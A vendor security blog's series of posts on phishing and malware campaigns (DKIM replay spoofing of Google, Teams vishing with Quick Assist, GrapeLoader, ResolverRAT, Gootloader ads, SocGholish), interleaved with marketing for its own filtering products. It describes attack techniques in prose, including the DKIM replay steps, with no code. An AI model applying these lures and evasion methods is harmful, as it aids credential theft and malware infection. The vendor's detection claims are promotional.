titanadmin
by titanadmin | Apr 30, 2025 | Phishing & Email Spam
Hackers have exploited a ‘vulnerability’ to conduct a phishing campaign that made it appear that the phishing email had been sent by Google from the no-reply[@]accounts.google.com address. The email was signed by Google and passed the DomainKeys Identified Mail (DKIM) authentication check, suggesting the email had been sent from a genuine Google account and was authentic, although the email had been sent from a different, non-Google address.
The campaign was identified by developer Nick Johnson, who received an email seemingly sent from no-reply[@]accounts.google.com with the subject Security Alert. The email claimed that Google LLC had been subpoenaed to obtain a copy of the contents of his Google account and that a support case had been opened and transferred to Legal Investigations Support. A support reference number was included along with a link to a Google Sites website, encouraging him to click the link to examine the case materials and “submit a protest,” if necessary, via the option on the support website.
The lure used in this phishing attempt is similar to many other phishing campaigns that threaten legal action or warn about police investigations, although what makes the attempt stand out is how the phisher managed to make the email appear to have been sent by Google and pass the DKIM authentication check, resulting in the email being delivered to his inbox.
While the subject matter was potentially serious, and the email had seemingly been sent by Google, there was a red flag that suggested a phishing attempt. As was noticed by Johnson, the link in the email did direct him to an official Google site, but it was sites.google.com, a free web-building platform provided by Google for users to create and host free web pages for personal purposes. No official email from Google would direct a user to that platform, and certainly not any message about a subpoena requiring the disclosure of the contents of their Google email account. The link directed Johnson to a fake support portal – a carbon copy of the official support portal, which had been scraped from the official site. The aim of the phish appears to have been to trick Johnson into logging in and disclosing his login credentials, allowing his Google account to be hijacked.
An analysis of the phishing attempt revealed Google was tricked into signing the email, thus allowing the message to bypass spam filtering service since the email successfully passed the DKIM and DMARC authentication checks. Closer inspection of the message header revealed the mailed-by address was different from the from address, and had been sent in what is known as a DKIM replay attack.
The message was actually sent to a me@ address at a domain that appeared to be managed by Google. According to Johnson, the attackers registered a domain and created a Google account for the me[@]domain.com, then created a Google OAuth app and used the entire phishing message for its name, which was then added to the name field. They granted themselves access to the email address in Google Workspace, then Google sent an alert to the me[@]domain.com account. The email was then forwarded to Johnson, and since the email had been generated by Google, it was able to pass the DKIM check as the parts of the message that DKIM checks had not been altered.
The vulnerability that was exploited was the fact that DKIM checks the message and the headers, not the envelope, which meant the email passed the validation checks because it had a valid signature. Since the exact email was extracted and saved without making any modifications to what was signed by DKIM, the validation checks were passed. Further, since the email was sent to a me@ email address, it shows that the message was delivered to the victim’s email address. Google explained in response to a query that it is aware of the phishing attempt and has rolled out protections to prevent further abuse.
The phishing attempt demonstrates the importance of stopping and thinking before clicking on any link in an email, no matter how serious the potential threat. The phishing attempt could have easily led to a compromised Google account had he not stopped to think about the request. Others may not have been as fortunate. While this was the first time that Google is known to have been affected by a DKIM replay attack, it is a known phishing technique and one that can be highly effective.
Security awareness training should make it clear that all emails can potentially contain a threat, even if the sender appears to be legitimate. Phishing lures related to legal threats, police investigations, and subpoenas should be included in the training as these are likely to create the fear that leads to a rapid click, and employees should be told to inspect the message headers to see the sender’s address and told to report any potential threat or suspicious email to their security team. They should also be provided with an easy one-click method of doing so in their email client.
Businesses should also ensure they have advanced anti-spam software with email sandboxing and URL filtering, and have multifactor authentication set up for all email accounts, with phishing-resistant multifactor authentication implemented when possible for the greatest protection.
by titanadmin | Apr 29, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
Sophisticated phishing campaigns have been identified that avoid detection by ensuring that only approved targets are funneled to the phishing pages where login credentials are harvested. In a standard phishing campaign, a threat actor sends out tens of thousands of phishing emails to an email list. Many lists are freely available but can also be purchased cheaply on dark web marketplaces. This approach is often referred to as spray and pray – send out large numbers of untargeted emails in the knowledge that a small but significant number of individuals will respond.
A variety of lures and social engineering techniques are used to trick the recipient into clicking a link in the email that directs them to a phishing page. The phishing page mimics a well-known company and informs the victim that they need to provide their login credentials to access the content they are expecting. When credentials are harvested, they are captured and used to log in to the user’s account. The phishing infrastructure used by threat actors is often identified and the URLS are added to real-time blacklists, after which they will be blocked by email security solutions. Phishing pages are often detected by crawlers and sandboxing environments and once a phishing page is added to a real-time blacklist, far fewer individuals would be directed to the page. The threat actor would then need to switch to a clean URL, one that has not been previously detected, to continue with the campaign.
One new technique recently observed in phishing campaigns involves limiting redirects to phishing pages to ensure that only approved targets access the phishing pages, helping to prolong the lifespan of the phishing pages by preventing them from being accessed by crawlers and sandbox environments. To analyze potential phishing pages, test credentials are entered. A legitimate login page would reject the credentials since they are invalid, but a phishing page would generally capture the data and redirect the user to a URL of the threat actor’s choosing. That could be the genuine login page of the service they are impersonating. The new technique validates the email addresses that are entered. If the email address is not on the original phishing list, the login attempt will be rejected and there will be no redirect to the phishing page, thus preventing analysis. This is achieved by adding validation scripts to phishing pages capable of validating email addresses in real-time or alternatively through API integrations. While this approach adds sophistication that would likely be unavailable to less skilled cybercriminals, these tools are now being included in phishing kits. Phishing kits provide the infrastructure so that even low-skilled cybercriminals can conduct highly sophisticated phishing campaigns. The kits, which can be used for a fee, can also include tools to bypass multi-factor authentication.
The increasing sophistication of phishing campaigns means businesses need to implement sophisticated phishing defenses, which means adopting a defense-in-depth approach with multiple overlapping layers of protection. In practice, that means a spam filtering service to prevent phishing emails from reaching their intended targets. Advanced spam filters for incoming mail, such as SpamTitan, incorporate multiple layers of protection by analyzing every aspect of incoming emails and subjecting them to in-depth analysis to validate their legitimacy. This includes antivirus engines for malware detection, email sandboxing for in-depth analysis of files to identify novel malware, and AI and machine learning to identify phishing and other malicious content, including checks of how an email deviates from typical emails received from a business. The SpamTitan enterprise spam filter also includes multiple validation checks of the sender’s email and domain, greylisting to initially reject messages and request resending to block spam, and allow-listing, blocking, and dedicated blocklists created through extensive threat intelligence gathering.
An anti-phishing solution is recommended for Microsoft 365 environments to catch the malicious emails that Microsoft often misses. The PhishTitan anti-phishing solution integrates seamlessly with Microsoft 365, blocking more threats by augmenting Microsoft’s defenses with the same engine that powers SpamTitan. PhishTitan also adds banners to inbound emails from external sources to alert users to potential risks and combats spoofing and masking by rewriting URLs, showing their true destination. In independent tests, TitanHQ’s email security suite has been proven to provide exceptional protection against phishing, spam, and malware with 100% detection rates in Q4, 2024, and more than 99.99% accuracy in Q1, 2025.
Multifactor authentication should be configured for all email accounts to provide an additional layer of protection, and all users should be provided with ongoing security awareness training. For the most effective training, it should be conducted continuously in small chunks each month rather than an annual training session. A phishing simulator should also be used to reinforce training and identify individuals who fail to recognize phishing attempts to ensure they can be provided with the additional training they need. The SafeTitan security awareness training and phishing simulation platform makes this easy for businesses.
Give the TitanHQ team a call for more information on increasing the sophistication of your email defenses. All TitanHQ solutions are also available on a free trial to allow you to put them to the test in your own environment before making a purchase decision.
by titanadmin | Apr 28, 2025 | Security Awareness
A new campaign has been identified that abuses Microsoft Teams to deliver malware in a tech support scam, where the user is tricked into believing they need assistance to resolve a technical issue that requires them to grant access via the built-in Microsoft remote monitoring and management tool, Windows Quick Assist.
Tech support scams are a very common form of cybercrime. According to the FBI’s Internet Crime Complaint Center (IC3), 36,002 complaints were received about tech support scams in 2024, making it the 6th most commonly reported cybercrime, and the third biggest cause of losses, with more than $1.46 billion lost to the scams in 2024 alone. It should be noted that many victims fail to report these scams to the FBI, so the number of victims and the losses are likely to be substantially higher.
While the companies impersonated are highly varied, these scams typically involve contact being made with the victim, with the scammer impersonating a member of the technical support team to resolve a fictitious technical issue. To make these scams more realistic, threat actors may add a targeted individual to numerous newsletters and spam sources, and then call to help them resolve the spam problem that the threat actor has created.
One of the latest scams saw contact made via Microsoft Teams on targets in the services sector, including finance, professional, and scientific services. One common denominator was that the targeted individuals all had female-sounding names, most of whom were executive-level employees. The scam was also conducted at specific times, between 2 p.m. and 3 p.m. local time, which the threat actors perceived would be the ideal time when attention would likely be reduced and the scam was most likely to succeed.
The Teams request was accompanied by a vishing call. Over the phone, the target was convinced to run a PowerShell command that was delivered via a Microsoft Teams message, which downloaded the first-stage payload. The QuickAssist tool was used by the threat actor for remote access to ensure the deployment of PowerShell, all under the guise of resolving a fictitious technical issue.
The threat actor used QuickAssist to deliver a signed file named Team Viewer.exe to a hidden folder, with that executable likely to be undetected as it would be hidden in normal system activity. The file was used to sideload a malicious DLL called TV.dll, which was used to deliver a second-stage JavaScript-based backdoor, providing persistent access to the user’s device. Persistence was achieved by modifying Registry entries. The campaign was identified by a ReliaQuest researcher and was attributed to a tracked threat actor that uses vishing attacks to infect users with malware, often leading to a ransomware attack. One method of blocking these attacks is to configure Microsoft Teams to block external communications to prevent the initial contact, and if Windows Defender is used, to set it to the most restrictive setting to limit the use of PowerShell.
Ultimately, this scam succeeded because an end user was contacted, and social engineering techniques were used to trick them into taking the actions that the threat actor could not otherwise have performed externally. The recently published Verizon Data Breach Investigations Report revealed that 60% of data breaches involved the human element, with social engineering one of the most common ways that employees are tricked. It is not necessary for threat actors to spend countless hours trying to find zero-day vulnerabilities in software solutions when they can just contact employees and get them to provide the access they need.
As the IC3 data shows, these scams are lucrative for threat actors, and one of the reasons why they are so successful is that they tend to take place over the phone, bypassing the need to defeat anti-spam software and other technical security measures. Since legitimate remote access tools are used, the malicious activity is easy to hide within normal system activity.
Security awareness training can go a long way toward improving defenses against these types of scams. Executives were targeted in this campaign as they have higher-level privileges than other workers, but security awareness training is often less robust at the executive level. It is important to ensure that all members of the workforce,e from the CEO down, are provided with security awareness training, and for the training courses to be tailored to different roles and the specific threats that each is likely to encounter.
With the SafeTitan security awareness training platform, it is easy to create tailored training programs for different members of the workforce and the unique threats that they face, including specific programs for the CEO and executives, the HR department, and the IT team. With the SafeTitan platform, there are hundreds of training modules tailored to different aspects of cybersecurity and different threats, making it quick and easy to create and deliver highly effective training courses covering phishing and other email-based attacks, smishing, vishing, and other cyber threats.
Give the TitanHQ team a call today for more information on improving your cybersecurity defenses and security awareness training programs. All TitanHQ solutions are available on a free trial, with support provided to make sure you get the most out of your trial.
by titanadmin | Apr 26, 2025 | Phishing & Email Spam
The latest data from Verizon has revealed that phishing was the third most common method of initial access in the data breaches the firm analyzed for its 2025 Data Breach Investigations Report. Phishing accounted for 16% of all data breaches in 2025, having been overtaken by vulnerability exploitation (20%). The leading initial access method was credential misuse, which was involved in 22% of data breaches. Verizon does note, however, that while incident responders may identify compromised credentials as the cause, it is not always clear how those credentials were obtained. It is possible that they were obtained in a previous phishing attack that went undetected, so phishing may have been involved in a higher percentage of data breaches.
The report highlights the extent to which cybercriminals exploit human weaknesses. The human element was involved in approximately 60% of data breaches in 2024, down slightly from the 61% of data breaches the previous year. The human element could involve a click on a link in a phishing email, resulting in the theft of credentials, a visit to a malicious website where malware is downloaded, a misconfiguration that is exploited, or a response to a phone call or text message. In 32% of data breaches, the human element was ascertained to result in credential abuse, 23% involved social interactions, 14% involved errors, and 7% involved interactions with malware.
This year’s report delves into the importance of security awareness training and how providing regular training can really make a difference to an organization’s security posture, especially when combined with phishing simulations. Providing training to the workforce will teach employees about security best practices, which will help to eradicate risky behaviors. Employees should be taught how to identify a phishing email and be conditioned to report any suspicious emails to their security team immediately. Phishing simulations help to reinforce training and identify individuals who have failed to apply the training. If an individual fails a phishing simulation, they can be provided with additional training to help ensure they do not make a similar identification error in the future.
The report revealed that out of the companies that provided security awareness training and conducted phishing simulations, there was a much higher reporting rate when employees had received training more recently. The baseline reporting rate was 5%, which shot up to 21% with recent training.
The data shows why it is so important to provide ongoing security awareness training to keep cybersecurity matters fresh in the mind. It is also important to incentivize employees to report potential phishing emails rather than punish those who don’t, and to clearly explain that reporting suspicious emails helps security teams to contain threats more quickly and limit the damage. It is also important to make it as easy as possible for employees to report potential threats. Ideally, employees should be able to report a potential phishing or scam email with a single click in their email client.
TitanHQ offers an email security suite that includes the SpamTitan cloud-based anti-spam service and the PhishTitan phishing prevention and remediation solution for Microsoft 365 users. SpamTitan incorporates dual anti-virus engines for detecting known malware, email sandboxing for detecting novel threats, AI and machine-based learning algorithms for identifying phishing and spam emails, plus SPF, DKIM & DMARC, allow listing, blocking, greylisting, and dedicated real-time block lists. An email client add-in is also provided to allow employees to easily report potential threats.
The PhishTitan solution is based on the same engine that powers SpamTitan, incorporating AI and machine learning to detect phishing threats, and also adds banner notifications for emails to warn employees about potential threats from external email addresses. The remediation tools provided by PhishTitan allow security teams to rapidly respond to threats and eliminate them from their email system.
Both email security solutions have high detection accuracy and provide best-in-class protection from email threats. In recent independent tests at VirusBulletin, the solutions were demonstrated to have exceptional detection accuracy, blocking in excess of 99.99% of spam and phishing threats, and thanks to the email sandbox service, TitanHQ’s solutions blocked 100% of malware.
TitanHQ can also help with security awareness training and phishing simulations. The SafeTitan platform makes it easy to create and automate continuous security awareness training programs for the workforce. The training content is enjoyable and interactive and is delivered using computer-based training, with individual modules taking no more than 10 minutes to complete.
The training content is regularly updated and has been proven to improve security awareness and reduce susceptibility to cyber threats, especially when combined with TitanHQ’s phishing simulator. Internal simulated phishing campaigns can be created and automated, and will automatically generate additional training immediately in response to a security failure, ensuring training is delivered at the time when it is most likely to be effective.
Through security awareness training and phishing simulations, organizations can reduce the employee errors that cause so many data breaches, and by using TitanHQ’s email security suite, threats will be blocked before employees’ security awareness is put to the test.
Give the TitanHQ team a call today to discuss the best options for improving your defenses. All TitanHQ solutions are available on a free trial and assistance can be provided to help you get the most out of the free trial.
by titanadmin | Apr 25, 2025 | Phishing & Email Spam
A recently published report commissioned by the UK’s Home Office and Department for Science Innovation and Technology (DSIT) has revealed that 43% of UK businesses and 30% of UK charities experienced a cybersecurity breach in the past 12 months.
While there was a slight fall in the number of businesses and charities suffering a cybersecurity incident, there was a significant increase in ransomware attacks. The survey was conducted on 2,180 businesses, 1,081 charities, and 574 educational institutions. Based on the number of confirmed cyber incidents, that equates to around 612,000 UK businesses and 61,000 UK charities experiencing a cyber breach or a cyberattack in the past 12 months.
While there was a slight decline in cyber incidents, which were confirmed by 50% of businesses in last year’s study, it is clear that hacking and other types of cyber incidents continue to pose a massive threat to UK businesses, with ransomware attacks of particular concern. According to the report, the estimated percentage of ransomware crime increased from less than half a percent in 2024 to 1% in 2025, which suggests that around 19,000 UK businesses experienced a ransomware incident in the past 12 months. 4% of large businesses and 3% of medium-sized businesses admitted to paying the ransom demand to recover their data and prevent its publication online.
The biggest cyber threat to UK businesses by some distance is phishing. Phishing is the fraudulent practice of sending emails or other messages that trick individuals into disclosing sensitive information such as login credentials or installing malware. Over the past 12 months, 93% of businesses and 95% of charities that experienced a cybercrime incident identified phishing as the cause of at least one of those incidents. Businesses that were confirmed victims of cybercrime in the past 12 months experienced an average of 30 cybercrime incidents in the past 12 months, with charities experiencing an average of 16 cybercrime incidents.
The credentials stolen in these attacks and the malware installed give cybercriminals initial access to internal networks. From there, they can deploy additional malware payloads and ransomware and steal sensitive data. The phishing problem is also getting worse for businesses, as cybercriminals are leveraging large language models (LLMs) to craft extremely convincing phishing emails and conduct phishing attacks at scale. These tools can be used to generate fake images, make phishing lures more believable, and make them harder to detect.
With phishing such a major threat and the high cost of dealing with each phishing incident, UK businesses and charities need to have email security defenses capable of detecting and blocking phishing threats, including those developed using AI and LLMs.
Phishing defenses should consist of anti-spam software, multifactor authentication, and end user security awareness training as a minimum. Advanced email filtering software incorporates antivirus software to identify known malware threats, email sandboxing for detecting novel malware threats, link scanning, and machine learning and AI-aided detection.
Over the past three quarters, SpamTitan from TitanHQ has consistently demonstrated in independent tests that it is capable of blocking even the most advanced threats, routinely achieving a 100% malware detection rate, and phishing and spam detection rates in excess of 99.99%.
TitanHQ also offers a comprehensive security awareness training and phishing simulation platform – SafeTitan – for improving awareness of cyber threats. When combined with phishing simulations, the platform has been shown to reduce employee susceptibility to phishing by up to 80%. The training content is enjoyable and memorable, and is delivered in training modules of no more than 10 minutes to maximize knowledge retention and make training easy to fit into busy workflows.
All TitanHQ solutions have been developed to provide powerful protection and advanced features, while also being easy to set up, configure, and use. Further, they are available at a price point that is affordable for businesses of all sizes. Give the TitanHQ team a call today to find out more about improving your defenses against phishing and other cyber threats. Further, TitanHQ’s cloud-based anti-spam service and security awareness training platform are available on a free trial, allowing you to put them to the test before making a purchase decision.
by titanadmin | Apr 24, 2025 | Phishing & Email Spam
A phishing scam has been identified targeting staff of European embassies with an invitation to a fake wine-tasting event. Targets include European diplomats and the staff of non-European countries at embassies located in Europe. The campaign has been linked to the Russian state-sponsored hacking group, Cozy Bear (aka APT29, Midnight Blizzard), and is believed to be primarily an espionage campaign.
The aim of the campaign is to deliver a stealthy new backdoor malware dubbed GrapeLoader. The campaign, identified by Check Point, is believed to be part of a wider campaign targeting European governments, diplomats, and think tanks. The malware delivered in the campaign serves as a loader for delivering additional payloads and is used as an initial stage tool for fingerprinting and establishing persistence.
As is typical with spear phishing campaigns, considerable effort has been put into creating a lure that is likely to elicit a response. A fake diplomatic event is used, commonly related to wine tasting, with some emails offering a place at a diplomatic dinner. The messages were sent by a specific individual at a legitimate but impersonated European foreign affairs ministry. A series of follow-up messages is sent to individuals who failed to respond to the fake invite. The phishing link is also configured to redirect the user to the real foreign ministry website if it is opened outside of the expected timezone or by an automated tool.
The emails prompt the recipient to click on an embedded hyperlink that directs them to a spoofed website where they are prompted to download a file. If successful, the user downloads a zip file containing a PowerPoint executable file called wine.exe, and two hidden DLL files, one of which allows the PowerPoint file to run. The PowerPoint file is used for DLL sideloading, including the other DLL file, dubbed GrapeLoader, which is used to deliver additional payloads. GrapeLoader fingerprints the device and establishes contact with its command-and-control server. A Run registry key is added to ensure that wine.exe is executed following a reboot.
The malware has been designed to be stealthy, including masking strings in its code and only decrypting them for a short time in the memory before they are erased. This technique prevents analysis using tools such as FLOSS. The malware also makes memory pages temporarily inaccessible to evade antivirus scans. GrapeLoader is thought to lead to the delivery of a modular backdoor known as WineLoader, which has been used in previous Cozy Bear campaigns on governments and political parties.
by titanadmin | Apr 22, 2025 | Phishing & Email Spam
One of the common tactics for getting phishing emails into inboxes is to use a legitimate service to send the emails, as the messages are far less likely to be blocked by email security solutions. Email security solutions perform reputation checks on email addresses and domains, and if they are determined to have been used for spamming or sending malicious emails, they are rapidly added to real-time blocklists (RBLs). If a certain trustworthiness threshold is exceeded, the messages will be blocked and quarantined, ensuring they do not reach their intended targets.
These reputation checks are often passed if emails are sent via trusted services such as Dropbox and Google Calendar, and similarly if malicious files or content are hosted on legitimate services such as OneDrive, GitHub, Google Drive, or SharePoint. The fact has not been lost on threat actors, who regularly abuse these services.
Fake login pages may be hosted on cloud storage services, and malicious files shared through them. Not only can these emails evade checks due to the good reputation of the sites, these well-known brands are familiar to end users and are often trusted, increasing the probability that credentials will be divulged or files will be downloaded.
For instance, a recent campaign abusing Dropbox used the platform to send an email about a shared file, which was also hosted on a legitimate Dropbox account. The email contained a link to a malicious PDF file, branded with the details of a company known to the targeted employees. The PDF file contained a link to another, unrelated website, where a malicious file was hosted. The phishing emails used a plausible lure to convince the user to click the link and download and execute the file.
A new campaign has recently been identified that uses a different legitimate service to evade reputation checks. The campaign, detected by security researchers at Kaspersky, was sent via a service called GetShared. While not as well-known as Google Calendar or Dropbox, the platform had a vulnerability that could be abused to send emails from a trusted domain and file-sharing service.
Similar to the Dropbox campaign, GetShared was used to send an email to targeted individuals advising them that a file had been shared with them via GetShared, as it was too large to send via email. The use of the file-sharing service seems reasonable, and the urgency was believable. The user was told that the file would be deleted after a month, and they were asked to provide a quote including the delivery time and payment terms. One of the intercepted emails targeted a designer using a shared file called DESIGN LOGO.rar.
The user was given a download button, which links to the site where the file can be downloaded. If the compressed file is opened and the contents extracted, there are several possible attack methods. An executable file could be in the compressed file that has a double file extension, making it likely that the file would be executed. Potentially, the file could contain a link to a malicious document or phishing page, although in this case, it was part of a vishing campaign. The compressed file contained contact details for the user to call, which would require a file download or disclosure of credentials or other sensitive information.
Earlier this year, a campaign was identified that used Google Calendar, with the emails sent through the platform containing a calendar invite. The invite is automatically added to the user’s Google Calendar account if they have Calendar set up and configured to automatically accept invitations. The invite contained a link to Google Forms or Google Drawings, which contained a link to a phishing website. That website impersonated a well-known brand and required the user to log in with their credentials. The campaign targeted more than 300 brands including healthcare providers, educational institutions, banks, and others, and involved thousands of emails.
Traditional email security solutions are unlikely to block emails from these trusted senders, and malicious files hosted on trusted platforms are also unlikely to be blocked. Businesses can combat these types of phishing attacks by using advanced email spam filter that incorporates AI and machine learning algorithms and email sandboxing in addition to the standard reputation checks and blacklists. The best spam filters for businesses provide multiple layers of protection to block these malicious emails and prevent them from reaching inboxes; however, due to the difficulty in distinguishing genuine from malicious communications from legitimate platforms, security awareness training is vital.
Employees should be trained on how to identify phishing emails and told not to trust emails from legitimate platforms, as while the platforms can be trusted, the content cannot. It is also recommended to use a phishing simulator to run simulations of phishing using lures that abuse trusted platforms to gauge how employees respond and provide targeted training to individuals who are tricked by these campaigns.
by titanadmin | Apr 19, 2025 | Network Security, Phishing & Email Spam
Healthcare organizations and pharmaceutical firms are being targeted in a phishing campaign distributing a recently discovered remote access trojan (RAT) called ResolverRAT. The campaign has been linked to infrastructure previously used to deliver information stealers such as Lumma Stealer and Rhadamathys, indicating an experienced threat actor is behind the campaign.
ResolverRAT is a stealthy RAT that runs entirely in the memory, which means it will not be detected by traditional antivirus solutions since files are not downloaded to the hard drive. Security solutions monitor Win32 API and file system operations and can detect anomalous activity; however, ResolverRAT abuses .NET ResourceResolve events, loading malicious assemblies without performing API calls, helping it evade monitoring tools.
The malware achieves persistence by adding XOR-obfuscated keys to the Windows Registry and additions to the filesystem in locations such as StartUp, Program Files, and localAppData, ensuring it is executed following a reboot. To make it more difficult to detect patterns in its callbacks to its command-and-control server, the malware communicates at random intervals. The malware is capable of data exfiltration, and even large files can be exfiltrated through a chunking process, helping to avoid detection by blending in with regular traffic. The malware has been designed to prevent analysis, and most of the components are unique, strongly suggesting it has been created from scratch by a skilled malware developer.
As with many other phishing campaigns, the ResolverRAT campaign uses social engineering techniques to trick end users. Lures are used that create a sense of urgency, demanding that action be taken immediately to prevent significant costs and legal problems. Emails used in the campaign include notices about copyright violations and other legal issues that require immediate action, along with a threat of legal consequences if the matter is not corrected immediately.
The emails contain a link to a website where the user is prompted to download and open a file to obtain more information about the legal issue – a copyright violation or legal investigation. If the link is clicked and the downloaded file is executed, ResolverRAT will be executed and will run in the memory through a DLL side-loading technique. The campaign has been conducted in multiple countries, with the lures written in the languages predominantly spoken in those countries – English, Italian, Czech, Turkish, Portuguese, Indonesian, and Hindi.
While considerable effort has been put into making the malware incredibly stealthy to evade security solutions, the delivery mechanism – phishing emails – allows infections to be blocked. It is important to use a combination of measures to block campaigns such as this. That starts with an advanced spam filtering service to block the phishing emails to prevent them from reaching end users. SpamTitan, a cloud-based anti-spam service from TitanHQ, performs reputation checks of senders, uses greylisting to identify large email runs indicative of spam, phishing, and malware distribution, subjects messages and headers to in-depth analysis, and analyzes embedded URLs and their destinations, with email sandboxing used to securely analyze message content.
Microsoft 365 users should consider augmenting Microsoft’s email security features with a third-party, dedicated anti-phishing solution. PhishTitan from TitanHQ is an anti-phishing and phishing remediation solution that improves phishing and malware detection rates for Microsoft 365, adds email banners to alert users to emails from external addresses, protects against malicious links in emails, and incorporates tools to allow malicious emails to be rapidly remediated across the entire email system. In independent tests, these solutions have been shown to block 100% of malware and in excess of 99.99% of phishing emails.
A web filter is also recommended to protect against redirects to malicious websites and block malware downloads from the Internet, adding an extra layer to your security defenses. It is also important to provide regular security awareness training to employees to show them how to identify the signs of phishing, condition them to report potential threats to their security team, and teach security best practices. Training should also be reinforced by using a phishing simulator to conduct phishing simulations internally.
Give the TitanHQ team a call today for more information on improving your defenses against phishing and malware infections to block sophisticated malware threats, including improving protection for Microsoft 365 environments. All TitanHQ solutions are available on a free trial and have been developed from the ground up to meet the needs of MSPs to help them better protect their clients against the ever-evolving cyber threat landscape.
by titanadmin | Apr 18, 2025 | Network Security, Website Filtering
A Gootloader malware campaign has been identified that uses Google Ads for initial contact with businesses, luring them in with realistic ads on a legitimate and trusted platform and tricking them into installing malware. Gootloader is a type of malware used to gain initial access to devices. First identified in 2020, the malware is used to attack Windows-based systems and deliver additional malware payloads. For example, the malware has been used to deliver Gootkit, a banking Trojan with information-stealing capabilities, and Gootloader is part of an “initial access as a service” platform, providing cybercriminal groups with the access they need to achieve their aims. For instance, access can be sold to ransomware groups.
Historically, Gootloader malware has been distributed via search engine (SEO) poisoning, which abuses Google and other search engines. This technique involves manipulating search engines to get malicious sites to appear high up in the search engine listings for key terms. By using SEO techniques, malicious sites appear high in the listings, giving Internet users the impression that the website is legitimate while also ensuring that enough people see the listing and click.
The latest campaign uses Google Ads to achieve the same purpose – getting a malicious site in front of users and giving them a reason to download a file. In this campaign, small businesses and other potentially high-value targets can be infected, which will be of interest to ransomware groups. Google performs checks of advertisers, and the company is usually able to prevent malicious adverts from appearing on the network; however, from time to time, those checks fail.
In this case, the campaign is attributed to a legitimate-sounding advertiser called Med Media Group Limited, which uses legal document templates such as contracts and non-disclosure agreements to attract small businesses. Fake websites are used in the campaign that appear legitimate, such as lawliner[.com]. The campaign has been configured to display ads for searches for legal documents, with the adverts claiming they provide a free template for the document with no sign-up required and no registration needed.
If the ad is clicked, the user is directed to a legitimate-looking and professional webpage. They are asked to enter their email address, and a link is sent via email for them to download the required document. The link directs the user to a different website, which triggers the download of a zip file containing a file that appears to be the document they require. For instance, the ad offering a non-disclosure agreement contains a file called non_disclosure_agreement_nda.js. The email directs the user to a site called skhm[.]org. The footer of the email claims the service is SKHM (Store, Keep, Host & Mail), and a mailing address is included along with a contact mobile phone number for a UK company called ENDOLE LTD.
The provision of a company name and contact information adds legitimacy, and if the provided number is called, they will be told that the company and the file are legitimate; however, that is certainly not the case. The downloaded file is JavaScript, and if it is executed, it will deliver Gootloader malware, which will establish persistence and reach out to its command-and-control server. After conducting reconnaissance to discover the local and networked environment, it will deliver secondary malware payloads.
The key to avoiding Gootloader infections is security awareness. There are several red flags with this campaign, although they can easily be missed. Registration on a site is usually required in order to get something for free. The site where the download occurs is different from the site used for the ad campaign, and the file is delivered in a zip file rather than a standard Word document or PDF. Further, a close look at the file will reveal it is an executable .js file, and a warning will be generated if an attempt is made to open the file, requiring confirmation before the file is executed.
Businesses should ensure that security awareness training is provided to employees to explain all of these red flags and other ways that cybercriminals use to distribute malware and phish for sensitive data. The SafeTitan security awareness training and phishing simulation platform makes it easy to create and automate training courses and phishing simulations. Businesses should also consider using a DNS filter to restrict access to malicious websites and block malware downloads from the Internet. The WebTitan DNS filter allows category-based filtering, preventing users from visiting certain risky categories of websites and websites serving no work purpose. WebTitan is constantly fed threat intelligence from a vast network of end users and will block access to malicious websites within a few minutes of a website or webpage being determined to be malicious, including redirects to malicious sites from compromised, legitimate websites. The solution can also be configured to prevent file downloads from the internet by file type, thus helping to prevent malware downloads. TitanHQ also offers a full suite of cybersecurity solutions, including anti-spam software with email sandboxing, anti-phishing protection, and email encryption and email archiving solutions.
by titanadmin | Apr 10, 2025 | Industry News, Spam Software
There was another excellent performance from TitanHQ’s email security suite in Q1, 2025, resulting in TitanHQ’s third consecutive VBSpam+ award from VirusBulletin for its email security suite. VirusBulletin is a renowned information security portal, testing, and certification body. VirusBulletin provides security professionals with invaluable intelligence on the latest global cyber threats and conducts independent tests of security solutions to find out how well they perform.
Throughout the year, VirusBulletin continually conducts tests of email security solutions to see how effective they are at blocking spam emails, along with dangerous threats such as phishing and malware. The results of the tests are published each quarter, with the tested email security solutions rated on their performance.
In the Q1, 2025 tests, one-third of the tested security solutions opted to be included in the public test, with the others choosing to keep their results and performances private. In the Q1, 2025, tests, the results from 11 full email security solutions and one open source solution were published. Email security solutions that have a 99.95% spam catch rate with no false positives, no more than 2.5% false positives for newsletters, and fast delivery speeds are awarded the VBSpam+ certification, while a final score of over 98% sees the VBSpam certification awarded.
For the past two quarters preceding the latest round of tests, the engine that powers the SpamTitan anti-spam software and PhishTitan anti-phishing solutions had an exceptional performance, blocking 100% of phishing emails and malware. In Q3, 2024, TitanHQ achieved the joint top spot for final score and finished in sole 1st place in Q4, 2024, with a 100% phishing, malware, and spam catch rate with a 0.00% false positive rate.
In the Q1, 2025, tests, TitanHQ achieved a 100% malware catch rate, a 99.999% phishing catch rate, a 99.997% spam catch rate, and a 0.00% false positive rate, giving an overall score of 99.997%, giving TitanHQ a top 2 ranking, beating solutions such as FortiMail, Mimecast, Zoho Mail, and Sophos Email. “SpamTitan demonstrated exceptional efficacy with only four misclassifications, one of which was a phishing attempt. The product’s outstanding performance earns it VBSpam+ certification,” explained VirusBulletin.
“This test reaffirms TitanHQ’s unmatched expertise in email security, solidifying our position as the premier choice for combating phishing attempts and spam infiltrations. With TitanHQ, customers gain unparalleled defense against these threats, with minimal false positives. These independent test results validate our commitment to providing top-tier protection against phishing, spam, and viruses, all while offering exceptional value.”
by titanadmin | Mar 31, 2025 | Internet Security, Phishing & Email Spam, Security Awareness
RansomHub is one of the most prolific ransomware-as-a-service (RaaS) groups now that the ALPHV/BlackCat operation has shut down and the LockBit operation has been hit with successive law enforcement actions. RansomHub engages in double extortion tactics, exfiltrating sensitive data from victims’ networks and encrypting files. Victims must pay to obtain the keys to decrypt their data and to prevent the publication of the stolen data on the RansomHub data leak site. Since emerging in early 2024, the group has conducted more than 200 attacks.
As a RaaS operation, RansomHub uses affiliates to conduct attacks in exchange for a percentage of any ransom payments they generate. The affiliates each have their specialties for breaching victims’ systems, including phishing, remote desktop protocol attacks, and the exploitation of unpatched vulnerabilities. Now, a new tactic is being used – The group is using the SocGholish malware-as-a-service (MaaS) framework for initial access, especially in attacks on the government sector.
SocGholish, also known as FakeUpdates, uses an obfuscated JavaScript loader that is primarily delivered via compromised legitimate websites. After compromising a website, malicious scripts are added that redirect users to webpages that display browser update notifications. These sites use social engineering to trick visitors into downloading a browser update, as they are told that their browser has a security issue or is not functioning correctly. If the user agrees, they download a zip file that contains a JavaScript file. If that file is executed, SocGholish malware is installed.
